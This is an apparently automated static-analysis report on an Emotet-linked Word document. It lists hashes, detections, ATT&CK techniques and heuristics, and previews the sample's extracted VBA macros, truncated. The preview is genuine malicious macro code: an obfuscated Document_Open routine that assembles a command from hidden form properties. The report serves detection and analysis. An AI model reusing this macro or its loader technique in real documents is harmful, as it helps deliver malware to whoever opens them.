Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 b45a65072e2ff22b…

MALICIOUS

Office (OLE)

200.9 KB Created: 2019-12-18 16:47:00 Authoring application: Microsoft Office Word First seen: 2020-02-04
MD5: 359ce657f31239321ff89c623cb8c691 SHA-1: 40e084436dc351d8a5843bd405925515d661e6c2 SHA-256: b45a65072e2ff22b6d0b44be7134d0f68cde2d872106ceb04089cd2735dc53eb
262 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample contains VBA macros, specifically a Document_Open macro that utilizes CreateObject and a hidden UserForm property to execute a command stager. ClamAV identifies this as Doc.Downloader.Emotet-7464570-0, strongly suggesting the Emotet family. The macro's primary function appears to be downloading and executing a second-stage payload.

Heuristics 7

  • ClamAV: Doc.Downloader.Emotet-7464570-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7464570-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11189 bytes
SHA-256: 7d6b095b4dc46cfa520e93bab140334ee73eed756d3f75e02ffea0d469ad14c6
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Ktbzpwygnmjl"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Sxdahqhm, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Vqkkqkdeedz = Sitdhosekwdb
Wkurgvkyexd = 157
Cmtdxgvvzv = ("Omnis nisi enim rerum.")
Sklluhjxuh = (528)
Dim Ltrjtevazf As Integer
Dim Qsfuxuwpohnl As Double
Dim Jqtlouskreo As Integer
Dim Uzflnutv As Boolean
Dim Ozakeveg As String
Dim Fufgnqvzga As Integer
Dim Lscpivaqf As String
Oflojoony = (191)
Dim Wauzxwyu As String
Ainhiomj = ("Temporibus eos eum.")
Fnmqbccmkrn = (650)
Dim Jvbujxdskdhow As Double
Bzcdsswio = Vumjxnxkdmgtc
Xukecedv = Ojkfmnnqlb
Afuqluuuf = "Eveniet dolor deserunt ad voluptatibus."
Qucxjcssybyi = 958
   Mknkfqopifhnc = Nnbxkclmrfasu
Qayiterwf = 925
Noyqfxxwwpbl = ("Assumenda asperiores.")
Byweeyticogo = (419)
Dim Rwqwsqpwnaacv As Integer
Dim Qopwnsfura As Boolean
Dim Emjkqdzf As Boolean
Dim Ftmeflvebdvxm As Boolean
Dim Sgfmbyvlqlje As Boolean
Dim Zvsksjwjjn As Integer
Dim Nzdegajsxxtty As Boolean
Hwtvhftchc = (196)
Dim Qvixsrckwhle As String
Xmcbzmsaonpr = ("Mabel")
Uxwbtgtwoabb = (367)
Dim Nzkplmhgafd As Boolean
Qhvhaejq = Kkdbaycayr
Odagalnxqyt = Ptsaxmxn
Ehlhixef = "Occaecati iusto a."
Csrgudxdbulqz = 1
   Fvvjkviqpi = Lwnhqlzdgll
Cexeaiqwjctp = 603
Tyzmzbuvrthgt = ("Deleniti explicabo voluptatem qui.")
Etkxrirlmoajt = (41)
Dim Trlpgegzlwxg As Integer
Dim Xtpdzfij As Boolean
Dim Ocnnxzrauxz As Double
Dim Egtxuzatbeho As Boolean
Dim Fuwlkzybeq As Boolean
Dim Mexmpehy As Integer
Dim Fhojrtmxgycom As Integer
Lpqwdbcetmwvp = (791)
Dim Hwahpoxa As String
Ogkuyysrn = ("Sapiente vero sed reprehenderit.")
Qchvcdvxvxw = (784)
Dim Qgneqkoo As Integer
Ovsjuoddbko = Tmmkbdmhrxhe
Nbdqahlsak = Jruuzpam
Ezmkxjwxlfbc = "Alias."
Ytnjialc = 504
Iobmoqajahxs
End Sub

Attribute VB_Name = "Vjgdknlt"
Attribute VB_Base = "0{5198C26E-EC35-48EC-B747-FBA047B9C264}{92B413BD-2514-4BCC-8A09-93C1A9E7EDC6}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Nmgafsqbbgpfo"
Function Xnfdptigz()
   Khwraequogtos = Swljvmnpphxkf
Cuvlyrbmv = 777
Ewydnidjjb = ("Non.")
Ekxrgkctlc = (727)
Dim Zsgpgqjq As Double
Dim Irrmtphwjf As Double
Dim Qabavctwac As Boolean
Dim Dvbncsrdqucf As Boolean
Dim Qnmpsbvpbgof As Double
Dim Xwkgcwiyn As Double
Dim Qoetwyvzblfk As Double
Myotvywxjg = (126)
Dim Wcdlrztvcn As Boolean
Fitgtwrmzwqy = ("Vel illo repellat ut.")
Suwtfxzmb = (833)
Dim Qtgrphzhtnnfq As String
Pilzmfrmgyz = Twtgajcck
Pqqarfpfos = Abgqzhzsqyr
Ugehckembkvoq = "Enim nam modi qui."
Jttqlfse = 423
Zseadboojgk = Ktbzpwygnmjl.Sxdahqhm
   Cysuqjobxd = Slixnadfz
Pzhbpubzwqhu = 605
Evlixnknb = ("Placeat quis.")
Prcujrlsf = (725)
Dim Jhzhveirkqvr As Double
Dim Swbwibxfv As Boolean
Dim Zfmywchc As Double
Dim Ejqsffkqpu As String
Dim Oqujvxbydlze As String
Dim Vsonnpztonkec As Boolean
Dim Pgfdgqwdmg As String
Lisjmwgj = (11)
Dim Cgkuvchz As Boolean
Elofubpizocg = ("Quia consequatur debitis.")
Okwdxhvnumd = (406)
Dim Lvtwmpowzunp As String
Yjdavdvgk = Bjzqqbbvh
Fsproroqinm = Drmivxfknrlfp
Sltddkdkle = "Enim vel."
Rtxrpjcnz = 908
Onemonoegwjl = Zseadboojgk + Vjgdknlt.Spzrnfjqi + Vjgdknlt.Gwdnlcihm + Vjgdknlt.Hhzbdrrf
   Eabwvkjadca = Vxrujavv
Sgrkxreo = 826
Hzznukcn = ("Ipsum voluptatem et.")
Pyluvfyqoe = (873)
Dim Czipdaljzonm As String
Dim Ydzzxhdtluvx As Integer
Dim Snzihpxaffgb As Double
Dim Jalyaahvrp As Integer
Dim Ojnougmsqlo As String
Dim Exyxusvft As Integer
Dim Iwwolxwkbt As Integer
Mrkapksxlht = (631)
Dim Jxwxliuz As Double
Xjxhtpedk = ("Woodrow")
Lgjsfvamzb = (151)
Dim Mczznplf As Integer
Mmqsczhgdi = Xqnfgnunddui
Tqrnzyvbu = Nsbesxui
Ilhjxlbgi = "Culpa ratione."
Hygqpp
... (truncated)